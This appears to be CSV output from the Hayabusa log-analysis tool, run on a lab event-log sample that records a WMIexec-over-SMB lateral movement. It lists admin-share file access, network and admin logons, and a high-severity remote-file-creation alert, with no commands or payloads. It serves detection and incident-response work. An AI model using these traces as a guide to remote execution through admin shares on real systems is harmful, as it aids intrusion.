+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 
10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
